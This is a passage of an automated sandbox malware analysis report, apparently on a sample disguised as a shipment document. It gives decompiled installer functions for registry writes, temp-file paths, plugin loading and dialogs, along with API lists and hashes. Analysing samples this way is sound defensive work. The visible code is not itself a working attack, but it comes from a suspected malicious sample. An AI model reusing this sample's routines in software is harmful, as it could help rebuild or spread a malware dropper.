					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                0x00401c43
                                                0x00401c45
                                                0x00401c4c
                                                0x00401c4f
                                                0x00401c52
                                                0x00401c5c
                                                0x00401c60
                                                0x00401c63
                                                0x00401c6c
                                                0x00401c6c
                                                0x00401c6f
                                                0x00401c73
                                                0x00401c7c
                                                0x00401c7c
                                                0x00401c7f
                                                0x00401c83
                                                0x00401c85
                                                0x00401cda
                                                0x00401cdc
                                                0x00401ce7
                                                0x00401cf1
                                                0x00401cf4
                                                0x00401cf4
                                                0x00401cfd
                                                0x00000000
                                                0x00401c87
                                                0x00401c8e
                                                0x00401c90
                                                0x00401c93
                                                0x00401c99
                                                0x00401ca0
                                                0x00401ca3
                                                0x00401ccb
                                                0x00401d03
                                                0x00401d03
                                                0x00401ca5
                                                0x00401cb3
                                                0x00401cbb
                                                0x00401cbe
                                                0x00401cbe
                                                0x00401ca3
                                                0x00401d06
                                                0x00401d09
                                                0x00401d0f
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                                • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
			}



















                                                0x00404d19
                                                0x00404d1e
                                                0x00404d26
                                                0x00404d27
                                                0x00404d34
                                                0x00404d3c
                                                0x00404d3d
                                                0x00404d3f
                                                0x00404d41
                                                0x00404d43
                                                0x00404d46
                                                0x00404d46
                                                0x00404d4d
                                                0x00404d53
                                                0x00404d53
                                                0x00404d5a
                                                0x00404d61
                                                0x00404d64
                                                0x00404d67
                                                0x00404d67
                                                0x00404d6b
                                                0x00404d7b
                                                0x00404d7d
                                                0x00404d80
                                                0x00404d29
                                                0x00404d29
                                                0x00404d30
                                                0x00404d30
                                                0x00404d88
                                                0x00404d93
                                                0x00404da9
                                                0x00404dba
                                                0x00404dd6

                                                APIs
                                                • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                • wsprintfW.USER32 ref: 00404DBA
                                                • SetDlgItemTextW.USER32 ref: 00404DCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: dd6052bb08b2cf0188f70179b0c63bbafe6d95c304151c4f0e040ce7d30f5014
                                                • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                                • Opcode Fuzzy Hash: dd6052bb08b2cf0188f70179b0c63bbafe6d95c304151c4f0e040ce7d30f5014
                                                • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5c8 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}












                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248d
                                                0x00402494
                                                0x0040249e
                                                0x004024a1
                                                0x004024aa
                                                0x004024b1
                                                0x004024b8
                                                0x004024bb
                                                0x004024c1
                                                0x004024cb
                                                0x004024cf
                                                0x004024da
                                                0x004024da
                                                0x004024e1
                                                0x004024eb
                                                0x004024f1
                                                0x004024f4
                                                0x004024f4
                                                0x004024f8
                                                0x00402504
                                                0x00402504
                                                0x0040251d
                                                0x0040251f
                                                0x0040251f
                                                0x00402522
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse53EC.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse53EC.tmp,00000000,00000011,00000002), ref: 00402515
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse53EC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nse53EC.tmp
                                                • API String ID: 2655323295-3240111903
                                                • Opcode ID: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                • Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
                                                • Opcode Fuzzy Hash: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                • Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E00405DD6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                0x00405dd7
                                                0x00405de4
                                                0x00405de5
                                                0x00405df0
                                                0x00405df8
                                                0x00405df8
                                                0x00405e00

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3916508600
                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC10E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E6EAC10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x6eac506c = _a8;
				 *0x6eac5070 = _a16;
				 *0x6eac5074 = _a12;
				_a12( *0x6eac5048, E6EAC1651, _t73);
				_t66 =  *0x6eac506c +  *0x6eac506c * 4 << 3;
				_t27 = E6EAC12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x6eac5040;
							if( *0x6eac5040 == 0) {
								goto L26;
							}
							E6EAC1603( *0x6eac5074, _t31 + 4, _t66);
							_t34 =  *0x6eac5040;
							_t86 = _t86 + 0xc;
							 *0x6eac5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6EAC1312(E6EAC135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6EAC1381(_t80, E6EAC12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E6EAC1603(_t10,  *0x6eac5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x6eac5040;
							 *0x6eac5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x6eac5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E6EAC1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x6eac506c +  *0x6eac506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E6EAC1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x6eac5070);
						 *( *0x6eac5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                0x6eac10eb
                                                0x6eac1100
                                                0x6eac1109
                                                0x6eac110e
                                                0x6eac1119
                                                0x6eac111c
                                                0x6eac1125
                                                0x6eac1129
                                                0x6eac112b
                                                0x6eac12b0
                                                0x6eac12ba
                                                0x6eac12ba
                                                0x6eac1132
                                                0x6eac1132
                                                0x6eac1137
                                                0x6eac1138
                                                0x6eac113a
                                                0x6eac113d
                                                0x6eac1256
                                                0x6eac1259
                                                0x6eac1271
                                                0x6eac1271
                                                0x6eac1278
                                                0x00000000
                                                0x00000000
                                                0x6eac1285
                                                0x6eac128a
                                                0x6eac128f
                                                0x6eac1294
                                                0x6eac129a
                                                0x6eac129b
                                                0x00000000
                                                0x6eac129b
                                                0x6eac125b
                                                0x6eac125e
                                                0x6eac11bc
                                                0x6eac11bf
                                                0x6eac11c2
                                                0x6eac11cb
                                                0x6eac11d0
                                                0x00000000
                                                0x6eac11d1
                                                0x6eac1264
                                                0x6eac1266
                                                0x6eac11a2
                                                0x6eac11a5
                                                0x6eac11a8
                                                0x6eac11b1
                                                0x00000000
                                                0x6eac11b1
                                                0x6eac1164
                                                0x6eac1165
                                                0x6eac1177
                                                0x6eac1180
                                                0x6eac1184
                                                0x6eac118e
                                                0x6eac1191
                                                0x6eac1193
                                                0x6eac1193
                                                0x00000000
                                                0x6eac1165
                                                0x6eac1143
                                                0x6eac1218
                                                0x6eac121d
                                                0x6eac1221
                                                0x6eac1223
                                                0x6eac122c
                                                0x6eac122f
                                                0x6eac1238
                                                0x6eac123d
                                                0x6eac123d
                                                0x6eac1247
                                                0x6eac124a
                                                0x00000000
                                                0x6eac1250
                                                0x6eac1149
                                                0x6eac114c
                                                0x6eac11e9
                                                0x6eac11ed
                                                0x6eac11f7
                                                0x6eac11fb
                                                0x6eac1205
                                                0x6eac120a
                                                0x6eac1211
                                                0x00000000
                                                0x6eac1211
                                                0x6eac1152
                                                0x6eac1155
                                                0x00000000
                                                0x00000000
                                                0x6eac115b
                                                0x6eac115e
                                                0x6eac11b8
                                                0x00000000
                                                0x6eac11b8
                                                0x6eac1160
                                                0x6eac1162
                                                0x6eac119e
                                                0x00000000
                                                0x6eac119e
                                                0x00000000
                                                0x6eac12a1
                                                0x6eac12a1
                                                0x6eac12ab
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 2860418dc6a6d5f3d32da5907862e3b2aa39b47e882c00e803e5b5aebae903a5
                                                • Instruction ID: d82c250a3191e00c86932b291e33cba71caf214f5d15e91029aea498199a359b
                                                • Opcode Fuzzy Hash: 2860418dc6a6d5f3d32da5907862e3b2aa39b47e882c00e803e5b5aebae903a5
                                                • Instruction Fuzzy Hash: 41517FB9600702DFDB40CFA8C94896577F8FB26F15B158529F904EB210EB34DD8ACB5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E00406529("C:\Users\hardz\AppData\Local\Temp\nse53EC.tmp", "C:\Users\hardz\AppData\Local\Temp\nse53EC.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\hardz\AppData\Local\Temp\nse53EC.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adc8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E00406467(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060D8(_t31, _t31) >= 0) {
						_t14 = E004060A9(_t31, "C:\Users\hardz\AppData\Local\Temp\nse53EC.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                0x0040263e
                                                0x0040263e
                                                0x0040263e
                                                0x00402643
                                                0x00402646
                                                0x00402649
                                                0x0040264e
                                                0x00402650
                                                0x00402670
                                                0x004026aa
                                                0x00402672
                                                0x00402674
                                                0x00402688
                                                0x00402695
                                                0x00402695
                                                0x00402652
                                                0x00402654
                                                0x00402659
                                                0x00402667
                                                0x0040266a
                                                0x004026af
                                                0x004026b2
                                                0x0040292e
                                                0x0040292e
                                                0x004026b8
                                                0x004026c1
                                                0x004026c3
                                                0x004026e2
                                                0x004015b4
                                                0x004015b6
                                                0x00000000
                                                0x004015bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004026c3
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nse53EC.tmp$C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll
                                                • API String ID: 1659193697-2821055346
                                                • Opcode ID: cd711f7fcb673a3df19b64ec8d5d4b60150aae82eff34f86b7281c3841aa243d
                                                • Instruction ID: 065fa95b7f6ceba1475350b2e5fd0629383d1058fb688f50996a10954fc95768
                                                • Opcode Fuzzy Hash: cd711f7fcb673a3df19b64ec8d5d4b60150aae82eff34f86b7281c3841aa243d
                                                • Instruction Fuzzy Hash: D011E772B00305BBCB10BBB18E4AE9E76B0AF40749F21443FF002B62C1D6FD8891965E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420ec0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42a22c;
						if(_t2 >  *0x42a22c) {
							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
							 *0x420ec0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406910(0);
					}
				} else {
					_t6 =  *0x420ec0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420ec0 = 0;
					return _t6;
				}
			}






                                                0x00403020
                                                0x0040303a
                                                0x00403040
                                                0x0040304a
                                                0x00403050
                                                0x00403056
                                                0x00403067
                                                0x00403070
                                                0x00000000
                                                0x00403075
                                                0x0040307c
                                                0x00403042
                                                0x00403049
                                                0x00403049
                                                0x00403022
                                                0x00403022
                                                0x00403029
                                                0x0040302c
                                                0x0040302c
                                                0x00403032
                                                0x00403039
                                                0x00403039

                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                • CreateDialogParamW.USER32 ref: 00403067
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
